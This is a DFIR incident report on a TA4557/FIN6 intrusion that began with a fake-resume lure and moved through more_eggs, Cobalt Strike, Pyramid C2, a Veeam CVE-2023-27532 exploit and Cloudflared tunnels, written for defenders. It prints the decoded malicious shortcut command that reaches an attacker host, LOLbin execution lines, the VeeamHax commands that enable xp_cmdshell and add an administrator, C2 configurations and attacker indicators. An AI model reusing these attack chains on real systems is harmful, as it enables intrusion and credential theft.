The Curious Case of an Egg-Cellent Resume
Key Takeaways
- Initial access was via a resume lure as part of a TA4557/FIN6 campaign.
- The threat actor abused LOLbins like ie4uinit.exe and msxsl.exe to run the more_eggs malware.
- Cobalt Strike and python-based C2 Pyramid were employed by the threat actor for post-exploitation activity.
- The threat actor abused CVE-2023-27532 to exploit a Veeam server and facilitate lateral movement and privilege escalation activities.
- The threat actor installed Cloudflared to assist in tunneling RDP traffic.
- This case was first published as a Private Threat Brief for customers in April of 2024.
- Eight new rules were created from this report and added to our Private Detection Ruleset.
An audio version of this report can be found on Spotify, Apple, YouTube, Audible, & Amazon.
The DFIR Report Services
- Private Threat Briefs: Over 20 private DFIR reports annually.
- Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.
- All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights reports, long-term tracking, data clustering, and other curated intel.
- Private Sigma Ruleset: Features 150+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples.
- DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.
Table of Contents:
- Case Summary
- Services
- Analysts
- Initial Access
- Execution
- Persistence
- Privilege Escalation
- Defense Evasion
- Credential Access
- Discovery
- Lateral Movement
- Command and Control
- Timeline
- Diamond Model
- Indicators
- Detections
- MITRE ATT&CK
Case Summary
In March 2024, an investigation took place after malicious activity was detected. Upon analysis, it was identified that a threat actor was able to infect and pivot from a user endpoint to two servers in the environment.
The threat actor was able to gain access by submitting a job application that pointed to a resume lure. This initial access campaign was observed by Proofpoint who attribute it to the group they track as TA4557. This group has historically overlapped with FIN6 activity, and has tooling overlaps with Cobalt Group and Evilnum.
After being directed to an online resume site from the job posting notice, the victim downloaded the fake resume zip and executed the malicious .lnk file within the zip. This started an execution flow with the threat actor using the ie4uinit.exe Microsoft executable to side-load a malicious .inf file. After that, the process dropped a malicious DLL which was executed using WMI. This then created a scheduled task, followed by another WMI process to load malicious JScript using the msxsl.exe Microsoft binary. This was the final more_eggs payload that established beacon activity to the command and control server.
Some initial discovery commands were then run using Microsoft binaries like nltest, net, and whoami. Activity mostly ceased until approximately one and a half days later when Cobalt Strike was dropped on the beachhead. First we observed the threat actor create shadow copies using vssadmin, which we assess was likely for trying to access credentials. This was followed up with some initial discovery using Microsoft utilities and the creation of a new user on the system.
The threat actor then used SharpShares and Seatbelt to further enumerate the host and the environment. The threat actor then attempted to deploy Pyramid on the beachhead, and while it was executed after much trouble, we observed little action from it or communication to its command and control server. After Pyramid, the threat actor began looking for lateral movement options. They decided to target a backup server running Veeam software. They were able to exploit the vulnerability, CVE-2023-27532, on the server and used the access to create a new local administrator account.
Using the new account on the backup server they used RDP to connect from the beachhead. During this and later RDP pivoting activity, the threat actor leaked several host names that tie to other intrusions that ended with a Fog ransomware deployment, as reported by Arctic Wolf. On the backup server the threat actor deployed their Cobalt Strike payload and continued discovery activity with more SharpShares and Seatbelt activity and then AdFind. At this time, on the backup server, LSASS memory was accessed for credentials.
Following this, the threat actor targeted a second server and this time used a remote service to replicate the creation of a new local administrator account on this second server. This service was created using a domain administrator account indicating the previous LSASS access was successful. The threat actor then checked various privileged users in the environment before locating a disabled domain administrator account that they re-enabled.
On the backup server, the threat actor then used the browser to access the file sharing site temp.sh to download a zip file containing a Cloudflared installer. The MSI installer in the zip was then run and Cloudflared was installed as a service on the server. They then connected to the second server using RDP and repeated the install process there. On this server, they then created another new user and added them to the local administrator group.
The threat actor then started a new RDP session with the new user and then dropped and executed SoftPerfect Network Scanner. After the scan, the threat actor opened a few files from a remote file share and then activity ceased for the day.
The following day the threat actor returned, pinging a host on a remote network. After this, they then removed the more_eggs files and persistence task on the beachhead and beaconing to more_eggs command and control ceased. The Cobalt Strike and Cloudflared tunnels remained active but no further activity was observed before the threat actor was evicted.
Further open-source investigation into the fake resume campaign identified numerous other lure sides with the same templates and images following the same <name>.com format.
This campaign is still ongoing with minimum changes to the lure websites or malware deployment observed. A list of domains identified are included in the indicators section of the report.
While the more_eggs malware and fake resume lures have been used by TA4557/FIN6 as early as 2018, this specific campaign appeared to have been established in late 2023. Below includes some previous analysis on the same campaign:
If you would like to get an email when we publish a new report, please subscribe here.
Analysts
Analysis and reporting completed by @_pete_0, Zach Stanford (aka @svch0st), and guest contributor Kelsey Merriman (aka @k3dg3) from Proofpoint
Initial Access
Proofpoint has been tracking TA4557 since 2018 as a skilled, financially motivated threat actor known to distribute the exclusive more_eggs backdoor, which can profile the endpoint and send additional payloads. TA4557 notably differs from other priority threat actors due to the unique tool and malware usage, campaign targeting, job candidate-themed lures, sophisticated evasive measures, distinct attack chains, and notable infrastructure patterns.
Throughout 2024, Proofpoint has observed TA4557 use multiple delivery approaches when targeting employees involved in the hiring process, including:
- Sending emails directly to employees containing instructions guiding the recipient to navigate to a resume-themed website that ultimately leads to malware delivery. The actor used various methods to prevent security tools from recognizing the domain in the email body, seemingly to avoid automated analysis. Examples include leaving a space or underscore before the TLD in the email body.
- Sending benign emails directly to employees, waiting for a response, then replying with an email containing instructions guiding the recipient to navigate to a resume-themed website that ultimately leads to malware delivery masquerading as a fake candidate and applying to legitimate job postings on various employment websites. The actor typically uploaded a resume to the job application containing instructions that guided users to a fake candidate web page.
- In March 2024, Proofpoint observed the use of the third approach in an email from a job board notifying a user that a new candidate (TA4557) had applied to the user’s open job posting. Our intrusion files and lure site matched this campaign.
In our intrusion, we were able to identify the origin of the malicious payload that was executed by parsing the user’s Edge SQLite databases.
The user downloaded John Shimkus.zip from the domain johnshimkus[.]com. The site had a captcha when the Download CV button was clicked and regenerates a unique download URL when we attempted to analyze the site further.
When visited from a Linux User Agent, the site returns a basic text resume instead of the download link in an attempt to avoid analysis.
The same website template and stock image was used in a TA4557 campaign that Proofpoint covered below:
Execution
Once the victim uncompressed the zip, they clicked the Windows Shortcut file John-_Shimkus.lnk which executed the infection flow.
Of note, the image 2.jpg that was alongside the payload in the .zip was not used by the malware. We assess that it was likely used to “pad” the zip in order to decrease detection potential.
Upon execution of the Windows Shortcut, there were several steps of execution that are discussed further below.
Starting with the .lnk , we were able to parse the file which revealed a long, obfuscated argument.
After decoding the cmd.exe argument, it becomes the following command, which outputs text to the ieuinit.inf file:
(for %%a in ("[089F]" "sc\" "ro%%Clarify%%j,NI,%%Serious%%%%Departments%%%%Departments%%p%%Jaguar%%%%Groups%%%%Groups%%a92837f.johnshimkus.%%Questions%%/setthevar" "[strings]" "Questions=com" "Groups=/" "Clarify=b;Proud" "Jaguar=:;Creatures" "Serious=h" "Danger=%%time%%" "Defines=init" "shortsvcname=' '" "Departments=t;Toast" "servicename=' '" "[destinationdirs]" "defaultdestdir=11" "824=01" "[defaultinstall.windows7]" "Un\" "Register\" "OCXs=089F" "delfiles=824" "[824]" "ieu%%Defines%%.inf" "[version]" "signature$windows nt$" ) do @echo %%~a) > "%%appdata%%\microsoft\ieuinit.inf"
And then moves a legitimate copy of the binary, ie4uinit.exe, to a custom location while also setting some additional environment variables.
call xcopy /Y /C /Q %%windir%%\system32\ie4uinit.exe "%%appdata%%\microsoft\*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%\microsoft\ie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
This section of commands appeared as follows in the process activity on the beachhead host:
%WINDIR%\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%\system32\ie4uinit.exe "%APPDATA%\microsoft\*" " %WINDIR%\system32\cmd.exe /S /D /c" set Pupils59=Seats " xcopy /Y /C /Q %WINDIR%\system32\ie4uinit.exe "%APPDATA%\microsoft\*" %WINDIR%\system32\cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%\microsoft\ie4uinit.exe -basesettings" " %WINDIR%\system32\cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"" wmic process call create "%APPDATA%\microsoft\ie4uinit.exe -basesettings" %APPDATA%\microsoft\ie4uinit.exe -basesetting
Abusing ie4uinit.exe (LOLBin)
The flow uses a documented execution hijack of IE4uinit.exe (https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/). By supplying a “side-loaded” .inf file to IE4uinit.exe, it can be used to load and execute COM scriptlets (SCT) from remote servers. In this case it was observed to reach out to the URL:
hxxp://a92837f.johnshimkus[.]com/setthevar
This was visible from the host via a DNS lookup by the ie4uinit.exe process:
And with a Suricata rule:
We can also use Prefetch to confirm that ie4uinit.exe interacted with the malicious ieuinit.inf:
More_Eggs
Shortly after the execution of ie4uinit.exe, the DLL 20350.dll was dropped in the AppData folder. The process wmiprvse.exe then spawned the following command:
regsvr32 /s /n /i:Action "C:\Users\<user>\AppData\Roaming\Microsoft\20350.dll"
This DLL created .txt files as well as the legitimate MSXSL executable that were used in the next stage of execution:
C:\ProgramData\Microsoft\51D7701F6EB775C7.txt (XML - Schtask) C:\ProgramData\Microsoft\29D88F75006BE8A.txt (XML - more_eggs script) C:\ProgramData\Microsoft\178F2E426.txt C:\ProgramData\Microsoft\msxsl.exe (Legitimate Binary)
The chain then used schtasks to setup persistence for the more_eggs malware.
schtasks /Create /TN "8766714F94DD" /XML "C:\ProgramData\Microsoft\51D7701F6EB775C7.txt"
Abusing msxsl.exe to deploy more_eggs
The more_eggs payload was finally loaded using the msxsl.exe binary using the documented technique – https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ :
C:\ProgramData\Microsoft\msxsl.exe 29D88F75006BE8A.txt 29D88F75006BE8A.txt
The file provided to msxsl.exe, 29D88F75006BE8A.txt, was an obfuscated JScript to load the more_eggs malware.
After executing, the more_eggs malware consistently ran the command:
typeperf.exe "\System\Processor Queue Length" -si 180 -sc 1
More than one and a half days after initial infection, the threat actor deployed a Cobalt Strike Beacon using regsvr.32.exe:
regsvr32.exe /s /n /i "C:\ProgramData\31765.ocx"
The .OCX file was an unsigned DLL file, with a size of 230KB.
Persistence
more_eggs
During the initial more_eggs execution a scheduled task command was run:
schtasks /Create /TN "8766714F94DD" /XML "C:\ProgramData\Microsoft\51D7701F6EB775C7.txt"
The schtasks command was run with the /XML flag pointing to a text file dropped by the threat actor. This flag according to the Microsoft documentation:
Creates a task specified in the XML file. Can be combined with the /ru and /rp parameters, or with the /rp parameter by itself if the XML file already contains the user account information.
So while using a text extension, the file was a ready made task for persistence. The task itself used a Boot Trigger to restart the malware after restart activity on the host.
The command arguments in the task pointed to a file on disk 178F2E426.txt containing:
When decoded we can see the script would result in the execution of msxsl.exe and the more_eggs script files disguised as text files.
Cloudflared
On a backup server the threat actor downloaded a zip file named cloudflared.zip from the temp.sh file sharing site using Internet Explorer. We can see the internet explorer process write the file and extract the download url from the WebCacheV01.dat file for the user.
The threat actor then installed the tool Cloudflared through the MSI installer on two hosts in the environment. Cloudflared is a tool that can be used to tunnel traffic through Cloudflare’s services. This allows the threat actor to proxy access to the private network through the tunnel.
"C:\Windows\System32\msiexec.exe" /i "C:\ProgramData\cloudflared\cloudflared-windows-amd64.msi"
Server | Command Line | Decoded Config (Redacted with Example Text) |
Backup Server | cloudflared-windows-amd64.exe service install eyJ<REDACTED>J9 | {“a”:”ddce269a1e3d054cae349621c198dd52″,”t”:”e8c8cb73-248f-4b39-9cf9-c6fb3b89edb9″,”s”:”AMYNzTjTCQQtlLE5j0ZY4zDYMwxj2wAMZTzQYUOjYZzMh0ty”} |
An app server | cloudflared.exe service install eyJ<REDACTED>J9 | {“a”:”ddce269a1e3d054cae349621c198dd52″,”t”:”35575e50-eae2-4d40-bcee-5a1986b0df1e”,”s”:”TYWmL3jYjMZMAwN3NMZBU3iMEMZ0mTJztgNhEW1jODMTG0tx”} |
The MSI and subsequent command would install the service (System EID 7045) as Cloudflared agent with the start type of auto start. This would allow persistent access through the tunnel established by the agent.
Installation of the CloudFlared results in Cloudflared Windows Events being logged in the Application log. The events indicating the Cloudflared service starting and the tunnel being established were recorded as Event ID 1 – Cloudflared.
Followed by tunnel establishment:
Create Accounts
During the intrusion the threat actor created four different user accounts. Three were local users and added to the host’s local Administrators group with a final user account being added to the domain and domain Administrators group. All of the users were added using net.exe but the commands were initiated via a variety of ways including local command shells, application exploits, and remote services.
User names observed during the intrusion:
User | Scope | Host | Execution Method |
backup | local | beachhead | Local cmd spawned from Cobalt Strike |
sqlbackup | local | backup server | exploit |
sqlbackup | local | management server | Remote service |
adm_1 | domain | management server | Cmd spawned from interactive RDP session |
Privilege Escalation
The threat actor then used a modified version of VeeamHax (https://github.com/sfewer-r7/CVE-2023-27532). This tool exploited CVE-2023-27532. Below is a side by side of the decompiled version we observed and the source. The main changes were to allow arbitrary SQL commands to be supplied as an argument evaluated on the Veeam target.
The –cmd argument gets executed through a hard coded xp_cmdshell command. As seen below, the threat actor stuck to using the default value in the original version of the VeeamHax exploit – c:\windows\notepad.exe.
This ended up being executed on the target SQL server but did not serve any purpose to their goals. The notepad process was used for Proof of Concept purposes. In this execution context, Notepad.exe is considered a harmless process that does not lead to any malicious activity. The –sql argument was the custom addition to the script that would allow arbitrary SQL commands to be passed to the exploit.
The threat actor ran the following commands using their custom version of VeeamHax.exe to enable xp_cmdshell before creating a local administrator named sqlbackup with the password of Password!1221!.
VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "select @@version" VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "EXEC sp_configure 'show advanced options', '1'" VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "RECONFIGURE" VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "EXEC sp_configure 'xp_cmdshell', '1' " VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "RECONFIGURE" VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "EXEC master..xp_cmdshell 'net user sqlbackup Password!1221! /add'" VeeamHax.exe --verbose --target <backup server> --port 9401 --cmd "c:\windows\notepad.exe" --sql "EXEC master..xp_cmdshell 'net localgroup administrators sqlbackup /add'"
The VeeamHax.exe binary included the developers Program Database (PDB) string as:
E:\Developer\yahtochka\2\CVE-2023-27532\obj\Release\VeeamHax.pdb
From the backup server we observed the net commands executed by the MSSQL process.
"%WINDIR%\system32\cmd.exe" /c net user sqlbackup Password!1221! /add "%WINDIR%\system32\cmd.exe" /c net localgroup administrators sqlbackup /add
The Security event log recorded the local account creation in Event ID 4720:
SQL Server associated Windows Application Event IDs for xp_cmdshell enable, followed by cmd execution are indicated by two event IDs 15457 in quick succession:
First event relates to enabling xp_cmdshell:
Followed by the xp_cmdshell execution:
Payload Failures
While the VeeamHax.exe process executed successfully, the process was observed terminating in the Windows Application Event Log under Event ID 1000 (Provider: Application Error). This indicates that the exploit didn’t safely handle exception errors, resulting in an application crash.
With an associated ‘.Net Runtime’ error:
The attacker was observed executing the process on several occasions, each time several application error events were observed. Resulting in associated Windows Error Reporting Event ID 1001 (Provider: Windows Error Reporting) being generated.
A WerFault process invoked by an application indicates that the application terminated unexpectedly. There were multiple exploit attempts by the threat actor in a short time frame.
Defense Evasion
The threat actor removed files and artifacts from hosts throughout the intrusion. For example the more_eggs payload deleted its own DLL after execution.
This behavior continued throughout the intrusion.
During the intrusion, after the threat actor pivoted to a backup server we observed a log event for Windows Defender being disabled. We observed no process event tied to this so we assess that this action was performed by the threat actor in the GUI with their RDP session.
Named pipes
From the Cobalt Strike regsvr32 process we observed usage of default Cobalt Strike named pipes.
Pipes observed:
\postex_18ab \postex_77cb
Credential Access
During the RDP session on the backup server, the threat actor opened powershell_ise.exe and ran the script Veeam-Get-Creds.ps1 (https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1).
The PowerShell operational log with event ID 4103 and 4104 tracked the output of the script which highlighted they successfully extracted an Administrator password from the Veeam database.
The LSASS process on the backup server was accessed via the RunDll32 (Cobalt Strike) beacon using a well known Granted Access pattern of 0x1010 – PROCESS_QUERY_LIMITED_INFORMATION (0x1000) & PROCESS_VM_READ (0x0010)
The RunDll32 process was also observed interacting with other processes such as cmd.exe and RunDll32.exe, using SYSTEM, a compromised account domain administrator account and a newly created local account.
System Recovery
The use of the Microsoft utility VSSADMIN (Volume Shadow Copy Service) was observed on the beachhead host for listing the configured shadows and then creating a new shadow. It appears that the threat actor had trouble executing the command and repeated the attempt again with an extra ‘cmd’ invocation.
C:\Windows\system32\cmd.exe /C vssadmin list shadows C:\Windows\system32\cmd.exe /C vssadmin create shadow /for=C: 2>&1 C:\Windows\system32\cmd.exe /C vssadmin create shadow C:\Windows\system32\cmd.exe /C cmd /c vssadmin create shadow /for=C: 2>&1
We never observed any interaction with the created shadow copy. It’s unclear why the threat actor initiated this command. A hypothesis to why a shadow volume would be created, would be to extract credentials via local saved stores (SAM hives for example as this was not a Domain Controller).
There is a an identical ‘vssadmin’ command detailed on various Red Team tutorials (https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin)
Discovery
Initial discovery actions started around 10 minutes after the initial execution of the malware. Standard Windows utilities were used:
cmd /v /c nltest /trusted_domains > "%TEMP%\22041.txt" 2>&1 cmd /v /c net group /domain "Domain Admins" > "%TEMP%\51362.txt" 2>&1 cmd /v /c whoami /upn > "%TEMP%\26906.txt" 2>&1
The threat actor later used the Cobalt Strike beacon to execute numerous other discovery commands:
%WINDIR%\system32\cmd.exe /C query session %WINDIR%\system32\cmd.exe /C nslookup %WINDIR%\system32\cmd.exe /C ping -n 1 <DOMAIN> %WINDIR%\system32\cmd.exe /C net usre REDACTED /dom %WINDIR%\system32\cmd.exe /C net user REDACTED /dom
We suspect the threat actor was using the execute-assembly function of the Cobalt Strike beacon as there were several instances of rundll32.exe that had dotNet code injected into them.
The victim organization was recording certain key ETW providers which allows us to capture the threat actor loading certain modules. The following was recorded, which highlighted the threat actor using the known enumeration tool Seatbelt and SharpShares.
Microsoft-Windows-DotNETRuntimeRundown {A669021C-C450-4609-A035-5AF59AF4DF18} Seatbelt "EventID":153 "CommandLine":"C:\\Windows\\system32\\rundll32.exe" "ModuleILPath":"Seatbelt" "ManagedPdbBuildPath":"Z:\\Agressor\\github.com-GhostPack\\Seatbelt-master\\Seatbelt\\obj\\Debug\\Seatbelt.pdb" SharpShares "EventID":153 "CommandLine":"C:\\Windows\\system32\\rundll32.exe" "ModuleILPath":"SharpShares" "ManagedPdbBuildPath":"C:\\Users\\mmoser\\source\\repos\\SharpShares\\SharpShares\\obj\\Release\\SharpShares.pdb"
The execution of these tools generated the files seatinfo.txt and share.txt, which the threat actor viewed on host.
type C:\programdata\shares.txt (A list of file shares in the network) type c:\programdata\seatinfo.txt (Output of Seatbelt)
Invoking SharpShares or SeatBelt (both .NET/managed applications) within an unmanaged code-based process (e.g., RunDLL32) results in the creation of a Common Language Runtime (CLR) usage log file as a side effect.
C:\Users\<REDACTED>\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log
The presence of this file for a process such as RunDLL32.exe indicates that a .Net compiled payload has been executed. In this case we can correlate this activity to the execute-assembly event.
Once the threat actor was able to access the backup server, they ran adfind.exe to gather further information on the domain:
adfind.exe -f "(objectcategory=person)" adfind.exe -f "objectcategory=computer" adfind.exe -subnets -f (objectCategory=subnet)
A network check was performed with route print followed by the creation of the following file C:\ProgramData\scaner.zip. Shortly after, from the unzipped contents, the threat actor executed the Soft Perfect Netscan tool:
C:\ProgramData\scaner\scaner\netscan.exe
Within the zip content, we observed that there were other previous saved scans from at least five other victim environments.
The license file accompanying netscan.exe is seen below:
<?xml version="1.0"?> <network-scanner-license> <license>o7fOIORWqaHfRIxHI1hcovfNXqvCKPNigA+oOK8UtlSJGu342vVWzuTLsR4R0bLA9Rdh+Skt6lkYR75knjO8Uw1/5N4t9qM0CRC/xjmL/gpU2K/EZQDz7+64gTeMwzkzag3KBpDcZKwwYrqdx3kVCsDXwugDQijJ6vDTuyubTAY=</license> <upgrade>0</upgrade> <language>English</language> <nmap></nmap> <autoupdate> <prompt>false</prompt> <enabled>false</enabled> <lastcheck>0</lastcheck> </autoupdate> </network-scanner-license>
Shortly after the execution of netscan.exe, we observed a sudden increase in ICMP traffic which could be identified as a ping sweep across the network. Below is a sample of network traffic that exemplifies the incremental destination IP addresses during the sweep.
By reviewing the compromised user’s Shellbags, we were able to identify the threat actor rummaging through the file shares of the network
Local accounts were enumerated on the beachhead host, and was indicated by a number of Windows Event ID 4799 events being created, with the calling process being ‘Rundll32.exe’. After translating the CallerProcessID from hex to decimal we can correlate and confirm it as the Cobalt Strike process.
Lateral Movement
After creating a local administrator account by exploiting CVE-2023-27532, the threat actor moved to a Veeam backup server via Remote Desktop Protocol. Next, they pivoted again from the backup server to a second server in the environment using RDP.
As they were proxying their requests through their existing malware, their workstation name was leaked in the authentication event to reveal they were likely using Kali OS.
Once on the backup server the threat actor ran Cobalt Strike on the host using rundll32.exe.
rundll32.exe c:\programdata\payload_cr1.dll,DllInstall
This beacon had the same C2 details as the one used on the beachhead host.
An additional threat actor workstation name, PACKERP-VUDV41R, was leaked in the authentication logs from the backup server.
Of note, both the host names kali and PACKERP-VUDV41R were observed in the Arctic Fox article regarding a FOG ransomware case, along with several tools mentioned in this report.
Remote Service Creation
After exploiting Veeam and gaining access to the backup server the threat actor obtained credentials for a domain administrator account. using this account they created a remote service on a management server and created a sqlbackup user with the same properties as the one they created on the backup server.
This activity could be observed over the network with suricata rules:
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
And locally on the remote management server, 7045 events were created followed by process events to create the user account locally on the host.
After performing these actions the threat actor again used RDP to access this host.
Command and Control
The more_eggs malware was the most predominate command and control traffic until the threat actor deployed Cobalt Strike to the network which was significantly higher. As highlighted in the graph below, the Pyramid C2 was only used once.
more_eggs
The more_eggs payload communicated with the following command and control address:
IP | Port | Domain |
108.174.197.15 | 443 | pin.howasit[.]com |
This IP address has been tracked by the DFIR Threat Intelligence Group as active since mid March 2024 through November 2024.
Cobalt Strike
The full beacon configuration was not recoverable however a partial configuration was picked up during a memory scan across the environment:
"Server":"shehasgone.com", (144.208.127[.]15) "TargetUri":"/wp-includes/lu.png", "License":2073085114 "Host: bing.com" "Connection: close" "Accept-Language: en-GB;q=0.9, *;q=0.7"
Domain | shehasgone[.]com |
IP | 144.208.127[.]15 |
Port | 443 |
JA3 | a0e9f5d64349fb13191bc781f81f42e1 |
JA3s | d32d6a0ff9d52869cb6d4ab402b7306c |
JA4 | t12d190800_d83cc789557e_16bbda4055b2 |
JA4s | t120300_c02c_52d195ce1d92 |
This IP and domain were only seen active during March 2024 and the DFIR Threat Intelligence Group also observed the domain associated with the IP 109.104.152.24, although that address was not observed in this intrusion.
CloudFlare Tunnels
CloudFlared tunnels were established on two server hosts by the threat actor. One host showed persistent connections to the CloudFlare IPv4 range during the intrusion.
With DNS query requests to the following domains:
Deploying Pyramid C2
The threat actor transferred the file python-3.10.4-embed-amd64.zip through the Cobalt Strike beacon. This zip file included a number of files, including an exploit tool for Veeam. This was dropped on the beachhead in the user writable ‘ProgramData’ folder.
The zip file was masqueraded as a Python-3.10 install package. The attacker attempted to extract the zip file contents file via PowerShell commandlets, several combinations were attempted, this ultimately failed.
The threat actor decided to use the Windows provided utility ‘Tar’ instead.
Using the Tar utility, no target destination was specified by the threat actor. As a result by default the extraction created >200 files in the Windows\System32.
Undeterred, the threat actor used the 7zip command line utility that they downloaded in the ProgramData folder.
c:\programdata\ssh\7za.exe x "c:\programdata\ssh\python-3.10.4-embed-amd64.zip" -y
Unfortunately, the threat actor made a similar error, with files (> 200) extracted to the Windows\SysWOW64 folder location this time. This was due to their command session current directory being under C:\Windows\System32, with the application being 32-bit (SysWOW64).
The threat actor realized the error and switched to the correct current directory of C:\ProgramData\SSH. They used 7za again to extract the contents (> 200 files) into the correct location.
A lot of file creation events were observed throughout this process (>700 files), with python files (.py extension) being created in Windows folder locations that could be unusual.
Once finally uncompressed, the threat actor ran the following python file:
cmd.exe /C "python.exe cradle.py"
When analyzing the file crade.py and decoding its content, we identified it was a Pyramid beacon with the following configuration:
pyramid_server='172.96.139.82' pyramid_port='80' pyramid_user='fLCi6UsgLYKdj7Fi' pyramid_pass='Q6V26bKG68nLJ4T3UXkEFLJYsHvKgLVi' encryption='chacha20' encryptionpass='TestPass1' chacha20IV=b'12345678' pyramid_http='http' encode_encrypt_url='/login/' pyramid_module='base-bof_nanodump.py' user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
The IP address used for this C2 framework has been spotted sporadically by the DFIR Threat Intelligence Group with activity in March, July, and September of 2024.
Timeline
Indicators
Atomic
# TA4557 Resume Lure johnshimkus[.]com # Other Identified TA4557 Resume Lure Pages annetterawlings[.]com mitchellspearman[.]com mikedecook[.]com davidopkins[.]com markqualman[.]com julienolsson[.]com wlynch[.]com johncboins[.]com christianvelour[.]com lisasierra[.]com mikedecook[.]com jacksallay[.]com # more_eggs pin.howasit[.]com 108.174.197[.]15 # Cobalt Strike shehasgone[.]com 144.208.127[.]15 # Pyramind 172.96.139[.]82 # Computer Name kali PACKERP-VUDV41R
Computed
Name: John Shimkus.zip Size: 17421 bytes (17 KiB) SHA256: ffc89a2026fa2b2364dd180ede662fa4ac161323388f3553b6d6e4cb2601cb1f Name: John-_Shimkus.lnk Size: 5977 bytes (5.84 kB) SAH256: b56d2e095dc6c2171e461ca737cbdc0a35de7f4729b31fe41258f9cbd81309a1 Name: 31765.ocx Size: 236544 bytes (231 KiB) SHA256: 408f1f982bef7ab5a79057eec4079e5e8d87a0ee83361c79469018b791c03e8f Name: VeeamHax.exe Size: 7680 bytes (7 KiB) SHA256: aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d Name: AdFind.exe Size: 2195968 bytes (2144 KiB) SHA256: 4b8be22b23cd9098218a6f744baeb45c51b6fad6a559b01fe92dbb53c6e2c128 Name: cloudflared-windows-amd64.exe Size: 62660475 bytes (59 MiB) SHA256: 4569c869047a092032f6eac7cf0547591a03a0d750a6b104a606807ea282d608 Name: cloudflared-windows-amd64.msi Size: 18305536 bytes (17 MiB) SHA256: a26379ad2eb9de44691da254182ca65fb32596fe1217fe4fbddb173f361a0a9b Name: payload_cr1.dll (Cobalt Strike) Size: 236544 bytes (231 KiB) SHA256: 408f1f982bef7ab5a79057eec4079e5e8d87a0ee83361c79469018b791c03e8f Name: netscan.exe Size: 16047672 bytes (15 MiB) SHA256: a8a7fdbbc688029c0d97bf836da9ece926a85e78986d0e1ebd9b3467b3a72258
Additional Indicators provided by Proof Point
File Name John__Shimkus.lnk SHA256 95634a5c6a8290aaa9d287f28c7d22b3b7ca1cf974339fc89ea4d542fa2ec45a File Name Resume - John Shimkus.pdf File Size 259866 bytes File Type PDF document, version 1.7 MD5 987ad23508239b58739279048cb850d5 SHA1 62ea63b720556bda73eaf95be7a282193d19aa4d SHA256 fe63fdf34d66f1658e2c9227ac84adffaa2cbb8b689999d4d1ebc733fc5f0fce File name 5477CA40.txt Associated Filenames C:\ProgramData\Microsoft\5477CA40.txt File Size 896 bytes MD5 14c72c6c628104de0a93df124caa3e4a SHA1 03bd5fa3fa4b06190b26762c4ea7b4e6ac615819 SHA256 bd3df53a397af4fe5e1441b2c91a6149bac9d26c94e46de9dbcbfa9b8647a935 File name 2A2052FAA08D525.txt Associated Filenames C:\ProgramData\Microsoft\2A2052FAA08D525.txt File Size 1745 bytes MD5 6a0ddc6b06db8f7fef1e8934347d150d SHA1 6a8fed99d66e84524fc75c7bfe003dea750dab11 SHA256 29bc115b5ae8cf19578c1c6a6743c3e53b9247d8eb6c556bc9d056994c58835b File name 16304.dll Associated Filenames C:\Users\User\AppData\Roaming\Microsoft\16304.dll File Size 258560 bytes File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows MD5 bace25f5a53a4e6cde31fe2ca2bc39a9 SHA1 ac6521fa3b00f4e70ffb97ee1dfa895097d01dc8 SHA256 757e297137e8ed21622297ae8885740b5beb09bc07141cf8ce7b24dbd95bdaf0 File name 495D3BB0FEC9.txt Associated Filenames C:\ProgramData\Microsoft\495D3BB0FEC9.txt File Size 77881 bytes MD5 6886f4cce4041cf27dff8e2ecfbfd38d SHA1 b68eaed2a653ca79b8ef0b261eb4047ced6e16f4 SHA256 6f12dc858631cf90cd4fef57fbb52675b8649d777c7f86384c6535da0a59ad67 File name 60052.txt Associated Filenames C:\Windows\Temp\60052.txt C:\Users\User\AppData\Local\Temp\48744.txt File Size 80 bytes MD5 4fdbae9775a20dc33dec05e408c2a2ad SHA1 3eaa51632f2beae23d9811b9ff91e31c91092177 SHA256 228cd867898ab0b81d31212b2da03cc3e349c9000dfb33e77410e2937cea8532 File name kbbwi9hgjw File Size 357808 bytes SHA256 